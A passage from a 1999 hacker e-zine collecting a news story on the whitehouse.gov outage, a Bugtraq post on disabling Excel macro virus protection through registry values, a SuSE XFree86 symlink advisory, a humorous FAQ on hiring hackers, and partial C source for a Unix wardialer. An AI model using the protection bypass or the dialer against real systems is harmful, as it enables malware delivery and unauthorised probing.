15.0 Russian crackers take out whitehouse.gov?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From wired;
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18787.html

Did Russians Get Whitehouse.gov?
by Declan McCullagh

3:00 a.m. 29.Mar.99.PST WASHINGTON -- The official White House
Web site was offline all day Sunday in what appeared to be its most serious
outage to date.

A Russian online newspaper reported that anti-NATO crackers were responsible,
but a source close to whitehouse.gov blamed a hardware failure.

The site was down until about 10 a.m. EST Monday. Vistors were unable to
connect, although email to and from whitehouse.gov continued to work.

"They have a problem that is not related to an external attack," the source said
Sunday.

The White House is a popular target for cracking attempts, but no content on the
site has ever been altered. Dozens of break-in attempts happen every day, the
source said.

On Sunday, a number of other Web sites found their home pages replaced with
identical protests of US and NATO bombing of Yugoslavia.

"Russian hackers demand to stop terrorist aggression against Jugoslavia!" said
one message on a Web site operated by Orange Coast College in Costa Mesa,
California. Another note on the same page: "To Adolf Clinton: FUCK OUT,
looser!! Go fucks Monica!"
Other sites that boasted the same message included
cfmsd.com and darkarmies.com.

The Moscow-based Gazeta.Ru online newspaper said Russian crackers had broken
into those sites -- and had pulled the plug on whitehouse.gov too.

"Russian computer crime authorities, contacted by the newspaper, declared
that they would confront these hacking attacks with same severity as they would
have done in any other case of unauthorised penetration into computer networks
(punishable under section 272 of Russia's Penal Code, 1997).

But the authorities went on to stress, that 'no complaint was filed so far from
the American side, which would be necessary for us to start any sort of
proceedings,'"
Anton Nossik, who wrote the article, told Wired News in an email
message.

Security experts said whitehouse.gov was likely offline for one of three reasons:
A compromised router, a hardware failure, or a denial-of-service attack in which the
server is overloaded by attackers. Peter Shipley, the chief security architect
for KPMG, said there's no easy defense against denial-of-service attacks. Once
recognized, however, they can be dealt with within minutes or hours.

Shipley also said it was unlikely a hardware failure by itself would bring a
site like whitehouse.gov down for a day or more.

"You can bring a router back online rather easily," he said. "It's hard to believe a
router would keep a site down for 24 hours."


PSI.net, which provides the White House's link to the outside world, did not
immediately return phone calls late Sunday. Neither did a White House spokesman.

@HWA


16.0 New Excel macro virus can bypass protections and execute code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Date: Mon, 29 Mar 1999 12:51:09 -0500
From: rotaiv <rotaiv@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Bypassing Excel Macro Virus Protection

-----BEGIN PGP SIGNED MESSAGE-----

With the sudden attention macro viruses have received over the
weekend, I thought I would share a couple of items I find concerning
with Excel macro viruses.

In Excel, if you go to "Tools - Options - General" you can check the
"Macro Virus Protection" check-box and this should prevent any macro
viruses being executed without your knowledge. This is true is most
cases but it can be bypassed with several methods.


Password Protected Spreadsheets
=========================

If a file is password protected, Excel assumes this to be a "trusted"
source so it ignores the "Macro Virus Protection" option. This allows
any code contained in the document to be executed without the users
knowledge.

Here is a scenario that should not be to hard to believe: Someone
downloads a list of passwords for pornographic sites from alt.sex and
types in a disclaimer password such as "I AM AN ADULT". This allows a
macro virus can be executed even if the "Macro Virus Option" is
checked.

The solution is simple. Don't open any password documents from a non
trusted source. If you really want to open the file, type in the
password then hold down the SHIFT key before you click "OK" on the
password dialog box. Holding down the shift key will by-pass any
macros and prevent them from being executed.

For more details, refer to the following TechNet article:
Q176640 - XL: No Macro Virus Warning Appears Opening Protected
Workbook


Documents in the XLSTART Directory
============================

Any documents saved in the XLSTART directory are considered to be a
"trusted" source so once again, the "Macro Virus Protection" is
ignored. The solution here is obvious but no so easy to implement.
Don't allow any documents (or shortcuts) to be saved in this
directory. Remember, many users may have their PERSONAL.XLS file in
this directory which contains macros they have supposedly created
themselves.

The XLSTART directory on my PC is as follows:
C:\Program Files\Microsoft Office\Office\XLStart

For more details, refer to the following TechNet article:
Q180614 - XL: Workbooks in Startup Folder Are Not Scanned for Macros


Disabling 'Macro Virus Protection'
=========================

With Word, the macro virus protection can be disabled with the
following command:
Options.VirusProtection = False

To my knowledge, there is no such command for Excel. However, this
option can be changed with a reg hack that could be initiated from a
batch file or from a VBA macro Shell command. On my PC, the "Macro
Virus Protection"
option is stored as a dword value in the following
registry key:

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft
Excel]

To enable the virus protection, use:
"Options6"=dword:00000008

To disable the virus protection, use:
"Options6"=dword:00000000

This may not be exactly the same for every PC as "Options6" controls
several options depending on the value of the first four bits. See
below for details:

bit 0 Show Name part of Chart Tips
bit 1 Show Value part of Chart Tips
bit 2 Intellimouse Roll action: 0 = scroll, 1= zoom
bit 3 Macro Virus Protection
bit 4-15 (Reserved)

For more details, refer to the following TechNet article:
Q169811 - XL97: Using the Policy Editor to Force Macro Virus
Protection


Conclusion
========

I am sure many people are under the impression that if the "Macro
Virus Protection"
option is enabled in Excel they are safe from macro
viruses. However, if someone felt so inclined, they could easily
bypass this protection and execute VBA code without the users
knowledge.

I have tested all the above examples using Microsoft Office97
Professional with SR2. I found the references in TechNet but I have
not searched Microsoft's Web-site to see if there are any patches or
hot-fixes for these three items.

'nuff said ...

rotaiv -£-

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2

iQEVAwUBNv+9FwuGSvRTfa2rAQFFbgf/U5COtVp2xVU73ZuMRYL2QrBW/e4/18BR
zUWqsE0nlQNDd+yuHN6Izkmdr30DaQaWHG4/Uxr79etDdWb2co9aUurWNlN/tFls
Zog21KeDyuYPZ0PYrPstVjtV4dQlwyVnTzkNQiYFPH+a11Y6O5bKg2ri4nyciwMV
he7suRG8HbX13awEjbcga9L/UR843N/Bh32IoaPK2fgsIrE4jFkUkyJtgX+ISYRO
UMkTLosLJRpOlDThiy6pSa7aW1Fr7PmqbdeFOSEPFC7DFyJ99YwDSQEPY+hQu+pS
U3xlDGrJUj2Ei52r1wrx+ioSGYAWcks0NUPS7Ey5EJoRMEsivfC9Iw==
=42/h
-----END PGP SIGNATURE-----


@HWA


17.0 xfree86 SUSE exploit
~~~~~~~~~~~~~~~~~~~~

Date: Sun, 28 Mar 1999 23:20:58 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: SuSE Security Announcement - XFree86

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SuSE Security Announcement

Package: xf86-3.3.3-5
Date: Sun Mar 28 12:26:39 CEST 1999
Affected: unix operating systems using xfree86

______________________________________________________________________________

A security hole was discovered in the package mentioned above.
Please update as soon as possible or disable the service if you are using
this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as
well, please contact your vendor for information about this issue.

Thanks to the people from bugtraq for providing the details of this
vulnerability and especially the XFree86 programmers who made a fix
ready over the weekend.

Please note, that we provide this information on as "as-is" basis only.
There is no warranty whatsoever and no liability for any direct, indirect or
incidental damage arising from this information or the installation of
the update package.
______________________________________________________________________________

1. Problem Description

XFree86 creates a directory in /tmp with the name .X11-unix for
the X sockets and sets the directory to mode 1777.
If an attacker creates a symlink with that filename and points
it to another directory (e.g. /root), the permissions of the target
directory is set to 1777.

2. Impact

A local attacker may create files with any contents in any directory.

3. Solution

Upgrade your XF86.

As a temporary fix you can put these commands into /sbin/init.d/boot.local:

/bin/rm -rf /tmp/.X11-unix
mkdir -p -m 1777 /tmp/.X11-unix

______________________________________________________________________________

Here are the md5 checksums of the upgrade packages, please verify these
before installing the new packages:

glibc archives (SuSE 6.0):
d2bb4132bc487debea45288f8199e1e7 x8514-3.3.3.1-13.i386.rpm
5f5b6a53027d54cb9df4cafcb284d720 xagx-3.3.3.1-13.i386.rpm
0c651985aa39750ed787df42c9dc49f7 xfbdev-3.3.3.1-13.i386.rpm
7353be5812375a350c7499e4bb4f7781 xglint-3.3.3.1-13.i386.rpm
88182f0e22ed3f4f564d0f678dc37ffe xi128-3.3.3.1-13.i386.rpm
492ddd01dd10dcb83d2cbf5995b7396b xlkit-3.3.3.1-13.i386.rpm
5779042312519b30e214d8aa4b9c2313 xmach32-3.3.3.1-13.i386.rpm
9fee0e2a4bcf4fbaa91759bc004faf88 xmach64-3.3.3.1-13.i386.rpm
338041da9001b5e36c55f9ffa6209613 xmach8-3.3.3.1-13.i386.rpm
68124d6e36cc48396aad4e395cb9567b xmono-3.3.3.1-13.i386.rpm
ea4c0301ee8f33339f5908d82a4b271d xp9k-3.3.3.1-13.i386.rpm
d219a182a79723b258b28f87bc22ee68 xs3-3.3.3.1-13.i386.rpm
d8ad0f9b0d57f887cc076e794a749738 xs3v-3.3.3.1-13.i386.rpm
ff0c37343e5bd30261ab7f05604ea6e7 xsvga-3.3.3.1-13.i386.rpm
e151bf1ed2d6c9824b2c521dcf2f7141 xvga16-3.3.3.1-13.i386.rpm
9099ebe5428098f8ffacd1ab691b5937 xw32-3.3.3.1-13.i386.rpm
5627fc4da2eab1f56a9e636374982ede xxprt-3.3.3.1-13.i386.rpm

libc5 archives (SuSE <= 5.3):
cfe392df95404f0a223b8c983ee51ce1 x8514-3.3.3.1-13.i386.rpm
4fd3a27e24b6947ef62231cc4b5630dd xagx-3.3.3.1-13.i386.rpm
71e1f6bef32e321b997db67d87c3c20a xdevel-3.3.3.1-13.i386.rpm
944e63a37139bcaeffcfa85010567d39 xdoc-3.3.3.1-13.i386.rpm
0a6a5de750c11bf35b01744319abfd01 xextra-3.3.3.1-13.i386.rpm
324a7e56c0a46685fb26b802167d79d5 xf86-3.3.3.1-13.i386.rpm
a8a337baf2a85195e981eca2eaf3c855 xfbdev-3.3.3.1-13.i386.rpm
67a410a1c051eb70fa3e59935b50ec75 xfnt100-3.3.3.1-13.i386.rpm
436ce9d44dd875235d5ffd6eb0d5d07c xfntbig-3.3.3.1-13.i386.rpm
21ce9773f7782680bd1142c884c5e77b xfntcyr-3.3.3.1-13.i386.rpm
0e04aed9a681d142a4a912d365e57471 xfntscl-3.3.3.1-13.i386.rpm
12ffe00734e870c0a9a54fe87b13406b xfsetup-3.3.3.1-13.i386.rpm
289216e84448c380341f44796e8e1338 xglint-3.3.3.1-13.i386.rpm
43b1a9da5447b4ac7eac5d2f1501b313 xi128-3.3.3.1-13.i386.rpm
6626e4404dc0d7bc2f88b3b83f8ce136 xlkit-3.3.3.1-13.i386.rpm
ab461815a023185f6266d9901e92b6b8 xmach32-3.3.3.1-13.i386.rpm
bf28d6eb8bd8a9a4b37e5fe0b71c4597 xmach64-3.3.3.1-13.i386.rpm
b07d322b63b4dc1f0810612907caaaa0 xmach8-3.3.3.1-13.i386.rpm
7a56420b929cb1b3e8507d9b3b36b287 xman-3.3.3.1-13.i386.rpm
494687ca8adbebaf213eee10f4be290c xmono-3.3.3.1-13.i386.rpm
1cad4cdd644d4f17f4f936f5c2d95ff6 xp9k-3.3.3.1-13.i386.rpm
39683c93132a16f0e79fc414bfb338f1 xs3-3.3.3.1-13.i386.rpm
7a2707ff0cb3ee59d3695f01256c1484 xs3v-3.3.3.1-13.i386.rpm
5c0d05b4b1a53f039c35623c1669eb0f xshared-3.3.3.1-13.i386.rpm
cb707a8c22b77478236a81bc58f5edfa xsvga-3.3.3.1-13.i386.rpm
e1083e3e18f5a5aeb8de1aff93bd9026 xvga16-3.3.3.1-13.i386.rpm
bb74f0e93121a8747e8c38bf1e0121e0 xw32-3.3.3.1-13.i386.rpm
1d38958dd9ac4fbdd1ccef960667ab45 xxprt-3.3.3.1-13.i386.rpm

______________________________________________________________________________

You will find the updates on our ftp-Server:

SuSE 6.0:
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86-3.3.3.1-SuSE/glibc

SuSE <= 5.3:
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86-3.3.3.1-SuSE/libc5

Webpage for patches:
http://www.suse.de/patches/index.html

or try the following web pages for a list of mirrors:

http://www.suse.de/ftp.html
http://www.suse.com/ftp_new.html

______________________________________________________________________________

SuSE has got two free security mailing list services to which any
interested party may subscribe:

suse-security@suse.com - unmoderated and for general/linux/SuSE
security discussions. All SuSE security
announcements are send to this list.

suse-security-announce@suse.com - SuSE's announce-only mailing list.
Only SuSE's security annoucements are sent
to this list.

To subscribe, send an email to majordomo@suse.com with the text

subscribe suse-security
or
subscribe suse-security-announce

in the body of the message. Or just issue a

echo subscribe suse-security | mail majordomo@suse.com
or
echo subscribe suse-security-announce | mail majordomo@suse.com

______________________________________________________________________________

If you want to report *NEW* security bugs in the SuSE Linux Distribution
please send an email to security@suse.de or call our support line.
You may use pgp with the public key below to ensure confidentiality.
______________________________________________________________________________

This information is provided freely to everyone interested and may
be redistributed provided that it is not altered in any way.

Visit http://www.suse.de/security for our pgp finger print.

Type Bits/KeyID Date User ID
pub 2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12Cg==
=pIeS
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBNv6bd3ey5gA9JdPZAQHwdwf8CCyu3rkMCANYtEozsy6RL9Sgo2hEoTp+
HIcNLnetVAEakLFBE+YaYO/b6P5ZU8ohqQ7Z+LAZkodDbh0+JtKvyWk6ugt+MxnN
LywsPrvwvAyZadJYhp7KEgJwmGZVZ9/8fHJhWYgTLNJBj75o1LP9Cbb2e8b8ZRoM
70nETXVyuX9vz0gQVctS1RhPkqF7w/uJ72Q/1kFVr9jMzAVbYoYA9l1vaFdIjDhi
CYokjKs2vfKeCNSD3xciVi+FSOUBVh8MRPRgoXnCrdm2UeRpeZoUKVhfzGPdXD0I
VVIKzgEN83r/6CM9ZZskZMCdOKSN1HQPtcm3jfp/fOBQhZnYZQ9Muw==
=cskZ
-----END PGP SIGNATURE-----


@HWA


18.0 The proper care and feeding of your new hacker will ensure months of enjoyable employment on end.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is from: http://www.plethora.net/~seebs/faqs/hacker.html


The following list is an attempt to cover some of the issues that will invariably come up when people without previous experience of the hacker community try to hire
a hacker. This FAQ is intended for free distribution, and may be copied as desired. It is in an early revision. If you wish to modify the FAQ, or distribute it for
publication, please contact the author. The author is seebs@plethora.net. The official distribution site (as of revision 0.04) is
"http://www.plethora.net/~seebs/faqs/hacker.html".

If you find this information useful, please consider sending a token donation to the author; email for details.

DISCLAIMER: The author is a hacker. Bias is inevitable.

This document is copyright 1995, 1996, 1998 Peter Seebach. Unaltered distribution is permitted.

Revision 0.04 - Last modified September 7, 1998

Questions and Answers:

Section 0: Basic understanding.

0.0: Won't my hacker break into my computer and steal my trade secrets?

No. Hackers aren't, contrary to media reporting, the people who break into computers. Those are crackers. Hackers are people who enjoy playing with
computers. Your hacker may occasionally circumvent security measures, but this is not malicious; she just does it when the security is in her way, or because
she's curious.

0.1: Was it a good idea to hire a hacker?

It depends on the job. A hacker can be dramatically more effective than a non-hacker at a job, or dramatically less effective. Jobs where hackers are
particularly good are:
Systems administration
Programming
Design
Jobs where hackers are particularly bad are
Data entry

More generally, a job that requires fast and unexpected changes, significant skill, and is not very repetitive will be one a hacker will excel at. Repetitive, simple
jobs are a waste of a good hacker, and will make your hacker bored and frustrated. No one works well bored and frustrated.

The good news is, if you get a hacker on something he particularly likes, you will frequently see performance on the order of five to ten times what a "normal"
worker would produce. This is not consistent, and you shouldn't expect to see it all the time, but it will happen. This is most visible on particularly difficult
tasks.

0.2: How should I manage my hacker?

The same way you herd cats. It can be a bit confusing; they're not like most other workers. Don't worry! Your hacker is likely to be willing to suggest answers
to problems, if asked. Most hackers are nearly self-managing.

0.3: Wait, you just said "10 times", didn't you? You're not serious, right?

Actually, I said "ten times". And yes, I am serious; a hacker on a roll may be able to produce, in a period of a few months, something that a small development
group (say, 7-8 people) would have a hard time getting together over a year. They also may not. Your mileage will vary.

IBM used to report that certain programmers might be as much as 100 times as productive as other workers, or more. This kind of thing happens.

0.4: I don't understand this at all. This is confusing. Is there a book on this?

Not yet. In the meantime, check out The New Hacker's Dictionary (references below; also known as "the jargon file"), in particular some of the appendices.
The entire work is full of clarifications and details of how hackers think.

Section 1: Social issues

1.0: My hacker doesn't fit in well with our corporate society. She seems to do her work well, but she's not really
making many friends.

This is common. Your hacker may not have found any people around who get along with hackers. You may wish to consider offering her a position
tele-commuting, or flexible hours (read: night shift), which may actually improve her productivity. Or hire another one.

1.1: My hacker seems to dress funny. Is there any way to impress upon him the importance of corporate appearance?

Your hacker has a very good understanding of the importance of corporate appearance. It doesn't help you get your job done. IBM, Ford, and Microsoft
have all realized that people work better when they can dress however they want. Your hacker is dressed comfortably. A polite request to dress up some for
special occasions may well be honored, and most hackers will cheerfully wear clothes without holes in them if specifically asked.

1.2: My hacker won't call me by my title, and doesn't seem to respect me at all.

Your hacker doesn't respect your title. Hackers don't believe that management is "above" engineering; they believe that management is doing one job, and
engineering is doing another. They may well frequently talk as if management is beneath them, but this is really quite fair; your question implies that you talk as
if engineering is beneath you. Treat your hacker as an equal, and she will probably treat you as an equal -- quite a compliment!

1.3: My hacker constantly insults the work of my other workers.

Take your hacker aside, and ask for details of what's wrong with the existing work. It may be that there's something wrong with it. Don't let the fact that it runs
most of the time fool you; your hacker is probably bothered by the fact that it crashes at all. He may be able to suggest improvements which could
dramatically improve performance, reliability, or other features. It's worth looking into.

You may be able to convince your hacker to be more polite, but if there appear to be major differences, it's quite possible that one or more of your existing
staff are incompetent. Note that hackers, of course, have different standards of competence than many other people. (Read "different" as "much higher".)

Section 2: Productivity.

2.0: My hacker plays video games on company time.

Hackers, writers, and painters all need some amount of time to spend "percolating" -- doing something else to let their subconscious work on a problem. Your
hacker is probably stuck on something difficult. Don't worry about it.

2.1: But it's been two weeks since I saw anything!

Your hacker is working, alone probably, on a big project, and just started, right? She's probably trying to figure it all out in advance. Ask her how it's going; if
she starts a lot of sentences, but interrupts them all with "no, wait..." or "drat, that won't work", it's going well.

2.2: Isn't this damaging to productivity?

No. Your hacker needs to recreate and think about things in many ways. He will be more productive with this recreation than without it. Your hacker enjoys
working; don't worry about things getting done reasonably well and quickly.

2.3: My hacker is constantly doing things unrelated to her job responsibilities.

Do they need to be done? Very few hackers can resist solving a problem when they can solve it, and no one else is solving it. For that matter, is your hacker
getting her job done? If so, consider these other things a freebie or perk (for you). Although it may not be conventional, it's probably helping out quite a bit.

2.4: My hacker is writing a book, reading USENET news, playing video games, talking with friends on the phone, and
building sculptures out of paper clips. On company time!

He sounds happy. The chances are he's in one of three states:
1.Basic job responsibilities are periodic (phone support, documentation, et al.) and there's a lull in incoming work. Don't worry about it!
2.Your hacker is stuck on a difficult problem.
3.Your hacker is bored silly and is trying to find amusement. Perhaps you should find him more challenging work?

Any of these factors may be involved. All of them may be involved. In general, if the work is challenging, and is getting done, don't worry too much about the
process. You might ask for your corporation to be given credit in the book.

2.5: But my other workers are offended by my hacker's success, and it hurts their productivity.

Do you really need to have workers around who would rather be the person getting something done, than have it done already? Ego has very little place in the
workplace. If they can't do it well, assign them to something they can do.

Section 3: Stimulus and response

3.0: My hacker did something good, and I want to reward him.

Good! Here are some of the things most hackers would like to receive in exchange for their work:
1.Respect.
2.Admiration.
3.Compliments.
4.Understanding.
5.Discounts on expensive toys.
6.Money.

These are not necessarily in order. The 4th item (understanding) is the most difficult. Try to remember this good thing your hacker just did the next time you
discover he just spent a day playing x-trek. Rather than complaining about getting work done, write it off as "a perk" that was granted (informally) as a bonus
for a job well done. Don't worry; hackers get bored quickly when they aren't doing their work.

3.1: My hacker did something bad, and I want to punish him.

Don't. 30 years of psychological research has shown that punishment has no desirable long-term effects. Your hacker is not a lab rat. (Even if he *were* a lab
rat, punishment wouldn't work; at least, not if he were one of the sorts of lab rats the psych research was done on.) If you don't like something your hacker is
doing, express your concerns. Explain what it is that bothers you about the behavior.

Be prepared for an argument; your hacker is a rational entity, and presumably had reasons. Don't jump on him too quickly; they may turn out to be good
reasons.

Don't be afraid to apologize if you're wrong. If your hacker admits to having been wrong, don't demand an apology; so far as the hacker is concerned,
admitting to being wrong is an apology, most likely.

3.2: I don't get it. I offered my hacker a significant promotion, and she turned it down and acted offended.

A promotion frequently involves spending more time listening to people describing what they're doing, and less time playing with computers. Your hacker is
enjoying her work; if you want to offer a reward, consider an improvement in title, a possible raise, and some compliments. Make sure your hacker knows
you are pleased with her accomplishments -- that's what she's there for.

3.3: My company policy won't let me give my hacker any more raises until he's in management.

Your company policy is broken. A hacker can earn as much as $150 an hour (sometimes more) doing free-lance consulting. You may wish to offer your
hacker a contracted permanent consulting position with benefits, or otherwise find loopholes. Or, find perks to offer - many hackers will cheerfully accept a
discount on hardware from their favorite manufacturer as an effective raise.

3.4: I can't believe the hacker on my staff is worth as much as we're paying.

Ask the other staff in the department what the hacker does, and what they think of it. The chances are that your hacker is spending a few hours a week
answering arcane questions that would otherwise require an expensive external consultant. Your hacker may be fulfilling another job's worth of responsibilities
in his spare time around the office. Very few hackers aren't worth what they're getting paid; they enjoy accomplishing difficult tasks, and improving worker
efficiency.

Section 4: What does that mean?

4.0: My hacker doesn't speak English. At least, I don't think so.

Your hacker is a techie. Your best bet is to pick up a copy of TNHD (The New Hacker's Dictionary). It can be found as http://www.ccil.org/jargon (last I
checked) or from a good bookstore. If you have trouble understanding that reference, ask your hacker if she has a copy, or would be willing to explain her
terms. Most hackers are willing to explain terms. Be ready for condescension; it's not intended as an insult, but if you don't know the words, she probably has
to talk down to you at first to explain them.

It's a reasonably difficult set of words; there are a lot of them, and their usage is much more precise than it sounds. Hackers love word games.

[It is also possible that English is not your hacker's native language, and that it's not yours either. Feel free to substitute a more appropriate language.]

4.1: I can't get an estimate out of my hacker.

Your hacker hasn't figured out how hard the problem is yet. Unlike most workers, hackers will try very hard to refuse to give an estimate until they know for
sure that they understand the problem. This may include solving it.

No good engineer goes beyond 95% certainty. Most hackers are good engineers. If you say you will not try to hold him to the estimate (and mean it!) you are
much more likely to get an approximate estimate. The estimate may sound very high or very low; it may be very high or very low. Still, it's an estimate, and
you get what you ask for.

4.2: My hacker makes obscure, meaningless jokes.

If you feel brave, ask for an explanation. Most of them can be explained. It may take a while, but it may prove interesting.

4.3: My hacker counts from zero.

So does the computer. You can hide it, but computers count from zero. Most hackers do by habit, also.


Comments about this article can be sent to

seebs@plethora.net


19.0 Unix wardialer from w00w00 security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is included here for example purposes, the full source is available at
http://www.w00w00.org/w00w00/ShokDial/

<a href="http://www.w00w00.org/w00w00/ShokDial/">ShokDial Unix Wardialer source</a>

/* ShokDial */
/* w00w00! */
/* This is (I have never seen one anyway, I apologize if I'm wrong) */
/* the first war dialer that I've ever seen for unix. This will */
/* compile on most/all unix operating systems. */
/* */
/* Shok (Matt Conover) */
/* shok@sekurity.org, shok@w00w00.org */


#include <time.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>

#include "colors.h"

#define ERROR -1
#define LOGFILE "wardial.log" /*
* Used as the default logfile,
* unless you change this define
* or specify it as an option.
* Type: shokdial -h for help.
*/



#define VERSION "v4.1"
#define TIMEOUT 25 /*
* YOU WANT TO CONFIGURE THIS!!!
* This is how long it will wait until it
* gives up (or connects, whichever comes first
*/


/* You can do:
* ln -s /dev/cua1 /dev/modem
* or change this to /dev/cua1 (or whatever your COM is)
* cua0 = COM1 cua1 = COM2
* (in linux)...in IRIX this would be /dev/ttymX I believe
*/


#define MODEMPORT "/dev/modem"


/* Global variables */
/* ---------------- */
int fd; /* fd for modem */
int rand; /* Use random scanning if this is set */
int send; /* Do we send a string to the carrier? */
int daemon; /* Do we fork into the background? */
int listen; /* Do we check a response from the carrier? */
int useStdin; /* Do we read numbers from stdin? */
int numbytes; /* To verify that all the bytes were written */

int First3Digits; /* Such as "555" of 555-XXXX */
/* However, this also serves as the area code */
/* for a long distance number */

int First3Digits1; /* This allows multiple ranges such as */
/* 555-XXXX through 556-XXXX */

int Last3Digits; /* Used as XXX-555-XXXX */
int Last3Digits1; /* Same purpose as First3Digits1 */
int ScanMin; /* Number to scan from....like 0000 and up */
int ScanMin1; /* Where to hold ScanMin the whole time */
int ScanMax; /* Stop scanning when this number is reached */
int response; /* Used to test if response timed out */
char *LogFile; /* Where to log connections */
char buf[2048]; /* Buffer for strings returned by modem */
char pnum[512]; /* This is the phone number from config file */
char LocalOrLong; /* Dialing long distance of local */
char sendstring[512]; /* Send to string to carrier (if send is set) */

char *ProgName;

int noshow; /* Don't display opening port when reopening */
int conf; /* Dial using config file */
int noOK; /* Used with hanging up and checking "OK" */

volatile int sig; /* Set after signal received and finished */
volatile int connected = 0; /* Set to 1 when connected. */

/* Some statistics. */
int busy = 0;
int connect = 0;
int noresponse = 0;

/* Function prototypes */
/* ------------------- */
void usage(); /* Help/usage */
void version(); /* Display version */
void intro(); /* An introduction */
void daemonize_me(); /* Fork into the background */
void get_scanrange(); /* Get the scanning range */
void open_port(); /* Open modem port for dialing */
void init_modem(); /* Initialize the modem */
void dial_number(); /* Dial the number */
void inputdial(); /* Read numbers from stdin */
void confdial(char *confile); /* For reading/dialing from conf file */
void hangup(); /* Hang up modem. */
void menu(int signum); /* Called when an abort is received. */
void sighandler(int signum); /* Used when signals are received */
void sighandler1(int signum); /* Ditto */
void stopnow(int signum); /* Called from sig handler for an un- */
/* conditional exit. */

/* Function prototypes in other source files: */
/* ------------------------------------------ */
/* Check read/write/opens for errors */
void check_for_error(char *LogFile, int fd, int num, char *s);

/* Check for "OK" from modem in reads. */
int checkok(char *LogFile, int fd, char *buf, char *s);

/* Check if the phone num was valid. */
void local_validnum(int digits);
void long_validnum(int firstdigits, int lastdigits);

/* Check to make sure they didn't pass conflicting options. */
void checkoptions();

/* Other miscellaneous prototypes included to avoid. */
int clr();
void strip();

int main(int argc, char **argv)
{
int opt;
char *confile;

clr(); /* Clear the screen. */

/* Do some stuff with the arguments */
/* ----------------------------------------------------- */

ProgName = argv[0];

if (argc > 1) {
while ((opt = getopt (argc, argv, "SsrdvhL:lc:")) != ERROR)
switch(opt)
{
case 'S':
useStdin = 1;
break;

case 's':
send = 1;
break;

case 'r':
rand = 1;
break;

case 'd':
daemon = 1;
break;

case 'v':
version();

case 'h':
usage();

case 'L':
LogFile = optarg;
break;

case 'l':
listen = 1;
break;

case 'c':
conf = 1;
confile = optarg;
break;

case '?':
putchar('\n');
usage();

default:
usage();
}
}

/* Check to make sure they didn't pass conflicting options. */
checkoptions(); /* exit()'s if there is an error */

if (conf != 1 && useStdin != 1)
printf("\"%s-r%s\" (%srandom scanning%s) option not given, using %ssequential scanning%s instead.\n",
PINK, NORMAL, BOLDWHITE, NORMAL, BOLDRED, NORMAL);

if (LogFile == NULL) {
LogFile = LOGFILE;
printf("Using \"%s%s%s\" as log file.\n", BOLDGREEN, LogFile, NORMAL);
}

printf("\nHit any key to continue...");
getchar();

/* ----------------------------------------------------- */

clr(); /* Clear the screen. */
intro();

clr(); /* Clear the screen. */
if (conf != 1 && useStdin != 1) get_scanrange();


/* We don't want to handle any signals until here */
signal(SIGINT, menu);
signal(SIGTERM, menu);
signal(SIGHUP, SIG_IGN);
signal(SIGALRM, sighandler1);

if (daemon == 1)
daemonize_me(); /* Run the program in the background */

open_port(); /* Open MODEMPORT (by default /dev/cua1) */
init_modem(); /* Initialize modem (such as sending ATZ) */

if (send == 1) {
